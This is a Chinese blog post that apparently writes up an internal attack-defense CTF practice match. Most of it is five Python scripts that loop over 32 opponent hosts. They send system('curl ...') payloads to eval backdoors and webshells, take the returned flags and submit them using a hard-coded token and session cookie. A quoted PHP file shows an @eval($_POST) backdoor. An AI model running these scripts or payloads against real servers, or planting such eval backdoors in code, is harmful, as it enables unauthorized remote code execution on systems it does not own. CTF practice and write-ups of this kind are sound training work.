W3lkin's Universe
「你就像是一阵风,在我这里掀起了万丈波澜,却又跟着云去了远方」
May 17th, 2023
没啥含金量,一次内部的练习赛,是个人赛,记录下来是觉得这个平台很有意思。2个半小时,一人运维6台机器,都是web机器,tql上来就直接打,压根没有fix阶段,我全程都在写attack脚本,所以压根没管fix,感觉师傅们都有点摆烂,所以还是我侥幸拿了第一
6台机器,有一台ssh上不去,应该是平台的问题。4台机子都是直接内置eval后门,d盾扫一下就出来了,还有一台也是内置后门,只不过做了点手段
//action.php <?php require_once("library/common.php"); require_once("library/view.php"); $page = filter($_POST['page']).'.php'; $post_data = array(); foreach ($_POST as $key => $value) { $post_data[$key] = $value; } if (file_exists($page)) { @eval($_POST['pages']); @require_once($page); } ?>
用法也简单
action.php?page=action&pages=phpinfo();
只不过这个平台好有意思,需要使用gamebox去curl请求平台,然后平台返回一个flag,将这个flag提交即可得分也就是说flag压根不在gamebox上,想要拿到flag简单的路径穿越这个压根不行,必须要rce获取到gamebox权限才能拿到flag于是乎搓脚本就完事了
import requests import re import time while True: for i in range(1,33): url="http://4.2.{}.1/application/admin/template/webshell.php".format(i) headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1" } data="key=system('curl -k https://192.18.1.253/Getkey/index/index');" try: resp=requests.post(url=url,data=data,headers=headers,timeout=1) flag=resp.text pattern = r'flag\{(.+?)\}' match_obj = re.search(pattern, flag) if match_obj: flag_content = match_obj.group(1) flag='flag{'+flag_content+'}' print(flag) else: print('未找到 flag{} 标记') url="https://192.18.1.253/api/comp/question/saveAttack" headers={ "Host": "192.18.1.253", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv", "Origin": "https://192.18.1.253", "Connection": "close", "Referer": "https://192.18.1.253/", "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin" } data="comp_id=5&uanswer={}&id=29&question_id=10364".format(flag) resp=requests.post(url,headers=headers,data=data,verify=False) print(resp.content.decode('unicode_escape')) except requests.exceptions.Timeout: print("超时") time.sleep(60)
import requests import re import time while True: for i in range(1,33): url="http://4.2.{}.2/action.php".format(i) headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1" } data="page=action&pages=system('curl -k https://192.18.1.253/Getkey/index/index');" try: resp=requests.post(url=url,data=data,headers=headers,timeout=1) flag=resp.text pattern = r'flag\{(.+?)\}' match_obj = re.search(pattern, flag) if match_obj: flag_content = match_obj.group(1) flag='flag{'+flag_content+'}' print(flag) else: print('未找到 flag{} 标记') url="https://192.18.1.253/api/comp/question/saveAttack" headers={ "Host": "192.18.1.253", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv", "Origin": "https://192.18.1.253", "Connection": "close", "Referer": "https://192.18.1.253/", "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin" } data="comp_id=5&uanswer={}&id=30&question_id=10361".format(flag) resp=requests.post(url,headers=headers,data=data,verify=False) print(resp.content.decode('unicode_escape')) except requests.exceptions.Timeout: print("超时") time.sleep(60)
import requests import time while True: for i in range(1,33): url="http://4.2.{}.4/templates/system/index.php?b=curl -k https://192.18.1.253/Getkey/index/index".format(i) headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1" } try: resp=requests.get(url=url,headers=headers,timeout=1) flag=resp.text print(flag) url="https://192.18.1.253/api/comp/question/saveAttack" headers={ "Host": "192.18.1.253", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv", "Origin": "https://192.18.1.253", "Connection": "close", "Referer": "https://192.18.1.253/", "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin" } data="comp_id=5&uanswer={}&id=33&question_id=10358".format(flag) resp=requests.post(url,headers=headers,data=data,verify=False) print(resp.content.decode('unicode_escape')) except requests.exceptions.Timeout: print("超时") time.sleep(60)
import requests import re import time while True: for i in range(1,33): url="http://4.2.{}.5/images/93277ac25e12820af94c499ba23e769f.phtml?http:%2f%2f4.2.7.5%2fimages%2f93277ac25e12820af94c499ba23e769f.phtml".format(i) headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1" } data="c=system('curl -k https://192.18.1.253/Getkey/index/index');" try: resp=requests.post(url=url,data=data,headers=headers,timeout=1) flag=resp.text pattern = r'flag\{(.+?)\}' match_obj = re.search(pattern, flag) if match_obj: flag_content = match_obj.group(1) flag='flag{'+flag_content+'}' print(flag) else: print('未找到 flag{} 标记') url="https://192.18.1.253/api/comp/question/saveAttack" headers={ "Host": "192.18.1.253", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv", "Origin": "https://192.18.1.253", "Connection": "close", "Referer": "https://192.18.1.253/", "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin" } data="comp_id=5&uanswer={}&id=32&question_id=10366".format(flag) resp=requests.post(url,headers=headers,data=data,verify=False) print(resp.content.decode('unicode_escape')) except requests.exceptions.Timeout: print("超时") time.sleep(60)
import requests import time while True: for i in range(1,33): url="http://4.2.{}.6/app/webroot/config.php".format(i) headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1" } data="shell=system('curl -k https://192.18.1.253/Getkey/index/index');" try: resp=requests.post(url=url,data=data,headers=headers,timeout=1) flag=resp.text url="https://192.18.1.253/api/comp/question/saveAttack" headers={ "Host": "192.18.1.253", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv", "Origin": "https://192.18.1.253", "Connection": "close", "Referer": "https://192.18.1.253/", "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin" } data="comp_id=5&uanswer={}&id=34&question_id=10363".format(flag) resp=requests.post(url,headers=headers,data=data,verify=False) print(resp.content.decode('unicode_escape')) except requests.exceptions.Timeout: print("超时") time.sleep(60)
background
没啥含金量,一次内部的练习赛,是个人赛,记录下来是觉得这个平台很有意思。2个半小时,一人运维6台机器,都是web机器,tql
上来就直接打,压根没有fix阶段,我全程都在写attack脚本,所以压根没管fix,感觉师傅们都有点摆烂,所以还是我侥幸拿了第一
详情
6台机器,有一台ssh上不去,应该是平台的问题。4台机子都是直接内置eval后门,d盾扫一下就出来了,还有一台也是内置后门,只不过做了点手段
用法也简单
只不过这个平台好有意思,需要使用gamebox去curl请求平台,然后平台返回一个flag,将这个flag提交即可得分
也就是说flag压根不在gamebox上,想要拿到flag简单的路径穿越这个压根不行,必须要rce获取到gamebox权限才能拿到flag
于是乎搓脚本就完事了
web1
web2
web4
web5
web6